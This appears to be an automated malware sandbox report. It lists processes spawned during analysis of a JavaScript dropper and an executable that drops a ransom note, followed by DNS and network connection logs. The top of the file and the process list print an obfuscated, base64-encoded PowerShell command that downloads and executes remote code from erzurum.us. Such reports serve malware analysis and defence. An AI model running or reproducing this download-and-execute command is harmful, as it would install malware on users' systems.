poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=4244 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=4776 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\" -spe -an -ai#7zMap27821:190:7zEvent7189

C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe

"C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=3248 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=3984 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=4968 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5668 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=5048 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4696 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f0 0x4c4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6280 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\advancedrun-x64\" -spe -an -ai#7zMap21697:92:7zEvent13707

C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe

"C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe"

C:\Windows\system32\cmd.exe

"cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault037237eah27e8h403chbb49haa253b5c0bb1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff996c046f8,0x7ff996c04708,0x7ff996c04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc

C:\Windows\system32\cmd.exe

"cmd.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=5824 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=1672 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2252 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1384 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2296 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE

"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 2792

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 23.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.169.46:443 play.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
GB 142.250.187.206:443 clients2.google.com tcp
US 8.8.8.8:53 cxcs.microsoft.net udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
BE 104.68.66.114:443 cxcs.microsoft.net tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 114.66.68.104.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
GB 142.250.187.238:443 consent.google.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 bonzi.link udp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 d36ee2fcip1434.cloudfront.net udp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 82.4.106.151.in-addr.arpa udp
US 8.8.8.8:53 226.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 66.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 216.58.204.66:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 s0.2mdn.net udp
GB 216.58.204.70:443 s0.2mdn.net tcp
GB 216.58.204.70:443 s0.2mdn.net tcp
GB 216.58.204.70:443 s0.2mdn.net tcp
FR 151.106.4.82:80 bonzi.link tcp
FR 151.106.4.82:80 bonzi.link tcp
GB 216.58.204.70:443 s0.2mdn.net udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
GB 142.250.200.34:443 securepubads.g.doubleclick.net tcp
US 8.8.8.8:53 70.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 34.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 csi.gstatic.com udp
US 172.217.15.227:443 csi.gstatic.com tcp
US 8.8.8.8:53 227.15.217.172.in-addr.arpa udp
FR 151.106.4.82:80 bonzi.link tcp
FR 151.106.4.82:80 bonzi.link tcp
FR 151.106.4.82:80 bonzi.link tcp
US 172.217.15.227:443 csi.gstatic.com udp
US 8.8.8.8:53 apis.google.com udp
GB 172.217.16.238:443 apis.google.com udp
US 8.8.8.8:53 id.google.com udp
GB 142.250.200.35:443 id.google.com tcp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.35:443 id.google.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 35.215.58.216.in-addr.arpa udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 e2c24.gcp.gvt2.com udp
US 35.185.21.228:443 e2c24.gcp.gvt2.com tcp
US 8.8.8.8:53 228.21.185.35.in-addr.arpa udp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 172.217.169.3:443 beacons.gvt2.com tcp
US 8.8.8.8:53 beacons5.gvt3.com udp
FR 172.217.18.195:443 beacons5.gvt3.com tcp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 195.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.178.14:443 google.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 e2c74.gcp.gvt2.com udp
FR 34.1.15.89:443 e2c74.gcp.gvt2.com tcp
US 8.8.8.8:53 89.15.1.34.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 216.239.36.117:443 beacons2.gvt2.com tcp
US 216.239.36.117:443 beacons2.gvt2.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 117.36.239.216.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 repository-images.githubusercontent.com udp
US 185.199.109.133:443 repository-images.githubusercontent.com tcp
US 185.199.109.133:443 repository-images.githubusercontent.com tcp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.113.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 21.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 camo.githubusercontent.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 e2c68.gcp.gvt2.com udp
ZA 34.35.20.64:443 e2c68.gcp.gvt2.com tcp
US 8.8.8.8:53 64.20.35.34.in-addr.arpa udp
GB 172.217.169.3:443 beacons.gvt2.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 erzurum.us udp
US 172.234.222.138:443 erzurum.us tcp
US 172.234.222.138:443 erzurum.us tcp
US 8.8.8.8:53 vxvault.net udp
IS 82.221.129.39:443 vxvault.net tcp
IS 82.221.129.39:443 vxvault.net tcp
GB 216.58.212.195:80 www.gstatic.com tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 e2c56.gcp.gvt2.com udp
ES 34.0.206.140:443 e2c56.gcp.gvt2.com tcp
US 8.8.8.8:53 39.129.221.82.in-addr.arpa udp
US 8.8.8.8:53 140.206.0.34.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 172.217.169.3:443 beacons.gvt2.com udp
US 172.234.222.143:443 erzurum.us tcp
US 172.234.222.143:443 erzurum.us tcp
GB 142.250.187.206:443 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com tcp
US 172.234.222.138:443 erzurum.us tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 172.234.222.143:443 erzurum.us tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.169.46:443 play.google.com udp
US 8.8.8.8:53 www.nirsoft.net udp
US 138.128.181.29:443 www.nirsoft.net tcp
US 138.128.181.29:443 www.nirsoft.net tcp
US 138.128.181.29:443 www.nirsoft.net tcp
US 8.8.8.8:53 s7.addthis.com udp
US 138.128.181.29:443 www.nirsoft.net tcp
US 138.128.181.29:443 www.nirsoft.net tcp
US 138.128.181.29:443 www.nirsoft.net tcp
NL 23.216.252.74:443 s7.addthis.com tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 216.239.34.36:443 region1.google-analytics.com tcp
GB 172.217.169.66:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 29.181.128.138.in-addr.arpa udp
US 8.8.8.8:53 2.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.252.216.23.in-addr.arpa udp
US 8.8.8.8:53 66.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
GB 172.217.169.66:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 6.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 142.250.96.94:443 beacons2.gvt2.com udp
US 8.8.8.8:53 94.96.250.142.in-addr.arpa udp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 csi.gstatic.com udp
US 216.239.32.3:443 csi.gstatic.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 3.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 r4---sn-aigl6nsk.gvt1.com udp
GB 74.125.105.105:443 r4---sn-aigl6nsk.gvt1.com udp
US 8.8.8.8:53 105.105.125.74.in-addr.arpa udp
US 138.128.181.29:443 www.nirsoft.net tcp
US 8.8.8.8:53 cxcs.microsoft.net udp
BE 104.68.66.114:443 cxcs.microsoft.net tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
